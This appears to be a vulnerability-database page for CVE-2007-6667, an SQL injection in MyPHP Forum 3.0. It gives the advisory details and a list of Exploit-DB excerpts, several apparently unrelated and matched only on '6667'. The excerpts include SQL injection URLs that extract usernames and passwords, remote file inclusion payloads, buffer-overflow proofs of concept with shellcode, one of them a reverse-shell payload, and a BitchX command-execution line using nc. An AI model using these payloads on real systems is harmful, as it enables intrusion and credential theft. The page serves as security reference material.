CVE-2007-6667
Published: 2008-01-04
Priority P334, medium, 6.8 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.96% (57.0th percentile)
SQL injection vulnerability in faq.php in MyPHP Forum 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the member.php vector is already covered by CVE-2005-0413.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| myphp | myphp_forum | <= 3.0 | — |
| myphp | myphp_forum | — | — |
| myphp | myphp_forum | — | — |
GHSA
GHSA-hfg4-546m-7764: Multiple SQL injection vulnerabilities in MyPHP Forum 3
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-6777 [HIGH] CWE-89 GHSA-hfg4-546m-7764: Multiple SQL injection vulnerabilities in MyPHP Forum 3
Multiple SQL injection vulnerabilities in MyPHP Forum 3.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in a confirm action, the (2) user parameter in a newconfirm action, and (3) reqpwd action to member.php; and the (4) quote parameter in a post action and (5) pid parameter in an edit action to post.php, different vectors than CVE-2005-0413.2 and CVE-2007-6667.
GHSA
GHSA-c82x-g5gm-v74f: SQL injection vulnerability in faq
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-6667 [HIGH] CWE-89 GHSA-c82x-g5gm-v74f: SQL injection vulnerability in faq
SQL injection vulnerability in faq.php in MyPHP Forum 3.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: the member.php vector is already covered by CVE-2005-0413.
No detection rules found.
Exploit-DB
FiSH-irssi 0.99 - Evil ircd Buffer Overflow
exploitdb·2011-04-17·CVSS 10.0
CVE-2007-1397 [CRITICAL] FiSH-irssi 0.99 - Evil ircd Buffer Overflow
FiSH-irssi 0.99 - Evil ircd Buffer Overflow
---
# FiSH IRC encryption evil ircd PoC exploit.
# Abuses CVE-2007-1397
# Bad ircd, nasty bnc provider, nicknames over 100 char --> ruin.
# Runs arbitrary code which in this case shuts down irssi.
# Tested on my own compiled FiSH with irssi/fedora/x86
# There are a lot more problems like this one, you should /unload fish
# Caleb James DeLisle - cjd
use Socket;
$retPtr = "\x60\xef\xff\xbf";
# Pirated from some guy called gunslinger_
$exit1code = "\x31\xc0\xb0\x01\x31\xdb\xcd\x80";
$code = "\x90" x 120 . $exit1code . $retPtr;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "Couldn't open socket";
bind(SOCKET, sockaddr_in(6667, inet_aton("127.0.0.1"))) or die "Couldn't bind to port 6667";
listen(SOCKET,5) or die "Coul
Exploit-DB
MyPHP Forum 3.0 (Final) - Multiple SQL Injections
exploitdb·2007-12-31
CVE-2007-6667 MyPHP Forum 3.0 (Final) - Multiple SQL Injections
MyPHP Forum 3.0 (Final) - Multiple SQL Injections
---
Name : MyPHP Forum
So we can execute an sql injection through the bugged variable $id.
PoC:
http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*
Sql injection in member.php
So $member variable isn't controlled so we can exploit it.
PoC:
http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*
# milw0rm.com [2007-12-31]
Exploit-DB
Eggdrop Server Module Message Handling - Remote Buffer Overflow
exploitdb·2007-10-10
CVE-2007-2807 Eggdrop Server Module Message Handling - Remote Buffer Overflow
Eggdrop Server Module Message Handling - Remote Buffer Overflow
---
/*
Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
https://www.securityfocus.com/bid/24070
discovered by Bow Sineath
tested on eggdrop 1.6.18 / linux 2.4
-exploit is a fake ircd
replace shellcode.. strip 0x00,0x0a and a few more probably.
remember to add \n at end of shellcode.
poison some dns cache or .jump
play.
-bangus/magnum
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define LISTENPORT 6667
#define BACKLOG 3
#define RETADDR 0xbffff7b9
/*
* linux/x86/shell_reverse_tcp - 99 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* LPORT=4444, LHOST=10.0.0.250
*/
unsigned char shellcode[] =
"\xbf\x1a\x2f\xf0\x55\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\x
Exploit-DB
PHP blue dragon CMS 3.0.0 - Remote File Inclusion
exploitdb·2007-08-10
CVE-2007-4313 PHP blue dragon CMS 3.0.0 - Remote File Inclusion
PHP blue dragon CMS 3.0.0 - Remote File Inclusion
---
// Exploit Name: Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
//Script Homepage: http://phpbluedragon.pl/
// Author: Kacper [[email protected]]
// Author Homepage: devilteam.eu | kacper.bblog.pl
// Greetings to all the people from DEVIL TEAM, come join us on IRC!
//Irc: irc.milw0rm.com:6667 #devilteam
//Elo
Vulnerability:
http://127.0.0.1/~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=[evil_code?]
# milw0rm.com [2007-08-10]
Exploit-DB
BitchX 1.1-final - 'EXEC' Remote Command Execution
exploitdb·2007-06-21
CVE-2007-3360 BitchX 1.1-final - 'EXEC' Remote Command Execution
BitchX 1.1-final - 'EXEC' Remote Command Execution
---
/* Name: PBXS - Pointless BitchX Sploit
* Author: clarity_
* Infected Versions: 1.1-final and others?
* Synopsis: BitchX suffers from an unchecked bounds in a hash table in hook.c where one
* can inject data structures allowing for the remote execution of commands!
* Usage: Execute "gcc -o pbxs pbxs.c; ./pbxs ps -aux | nc -l -p 6667" Now when the vuln bitchx
* version connects to the mischievous server "ps -aux" will be executed.
* Shout Outs: solomon, crypt1, vortek, ziri, and all the other niggaz at svun @ undernet
*/
// Addresses for BitchX-1.1-final-linux.tar.gz avail on ftp.bitchx.org
#define HOOK_FUNCTIONS 0x81366e0
#define NICKNAME 0x8155353
#define STAR 0x8108f34
#include
#include
#include
#define NICK_STR ":bleh!i"
#define
Exploit-DB
MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion
exploitdb·2007-05-18
CVE-2007-2778 MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion
MolyX BOARD 2.5.0 - 'index.php?lang' Local File Inclusion
---
=============== MolyX BOARD 2.5.0 Local File Inclusion ==== Possibly other versions
=============== Vulnerability found by MurderSkillz ==============================================
=============== d0rk "Powered by MolyX BOARD 2.5.0" =========================================
=============== Website: g00ns.net g00ns-forum.net ============================================
=============== Irc: irc.exploitercode.com:6667 ts: ts.g00ns.net ====================================
=============== Script website: molyx.com ====================================================
############### Exploit ###################################################################
www.victim.com/[path to board if any]/index.php?lang=../../../../..
Exploit-DB
ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion
exploitdb·2007-03-24
CVE-2007-1708 ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion
ttCMS 4 - 'ez_sql.php?lib_path' Remote File Inclusion
---
DEVIL TEAM - HACKING POLISH TEAM
Author: Kacper (a.k.a Rahim)
Contact: [email protected]
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam
Greetings to everyone from the IRC channel and the DEVIL TEAM forum.
ttCMS <= v4 (ez_sql.php lib_path) RFI Vulnerability
script download/homepage: http://www.ttcms.com/v4/
Vulnerabilities:
http://site.com/ttCMS_path/lib/db/ez_sql.php?lib_path=[evil_code]
# milw0rm.com [2007-03-24]
Exploit-DB
Lms 1.8.9 - Vala Remote File Inclusion
exploitdb·2007-03-22
CVE-2007-1643 Lms 1.8.9 - Vala Remote File Inclusion
Lms 1.8.9 - Vala Remote File Inclusion
---
DEVIL TEAM - HACKING POLISH TEAM
Author: Kacper
Contact: [email protected]
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam
Greetings to everyone from the IRC channel and the DEVIL TEAM forum.
LMS <= 1.8.9 Vala Remote File Inclusion Vulnerabilities
script download/homepage: http://www.lms.org.pl/
Vulnerabilities:
http://strona.pl/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]
http://strona.pl/lms_path/modules/welcome.php?_LIB_DIR=[evil_code]
# milw0rm.com [2007-03-22]
Exploit-DB
Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service
exploitdb·2007-01-17
CVE-2007-0344 Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service
Colloquy 2.1.3545 - 'INVITE' Format String Denial of Service
---
#!/usr/bin/ruby
# (c) Copyright 2006 Lance M. Havok
#
# Makes use of the Colloquy INVITE format string vulnerability.
#
require 'socket'
target_channel = (ARGV[0] || "#whatever")
target_server = (ARGV[1] || "irc.server.org")
target_port = (ARGV[2] || 6667)
rand_nick = "spongebo"
channel_joined = false
ready_to_go = false
abuse_attempts = 2
chan_fmtstring = ("#%n%n%n%n") # develop payload when feeling like it.
target_furries = []
irc_socket = TCPSocket.new(target_server, target_port.to_i)
irc_socket.print "USER #{rand_nick} localhost localhost r\n"
irc_socket.print "NICK #{rand_nick}\r\n"
while true
s = irc_socket.gets
case s.strip
when /^PING :(.+)$/i
puts "++ PING..."
irc_socket.send "PONG :#{$1}\n", 0
puts "++ PONG."
Exploit-DB
IMGallery 2.5 - Create Uploader Script
exploitdb·2006-12-30
CVE-2007-0082 IMGallery 2.5 - Create Uploader Script
IMGallery 2.5 - Create Uploader Script
---
DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam http://www.rahim.webd.pl/ $wielkosc_pliku) {header("Location: start.php?kategoria_form=$kategoria_form&info=101&karet=$karet&PHPSESSID=$s_id"); exit;}
// determines the file's MIME type and creates the appropriate prefix for the GD functions
$typ_pliku = $_FILES['obraz']['type'];
switch($typ_pliku) //
to find you uploaded file go to:
http://site.com/IMGallery path/obrazy/(youfile)
greetz ;)
*/
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,
No writeups or analysis indexed.
http://osvdb.org/39781
http://osvdb.org/39782
http://www.securityfocus.com/bid/27083
https://exchange.xforce.ibmcloud.com/vulnerabilities/39347
https://www.exploit-db.com/exploits/4822
Published: 2008-01-04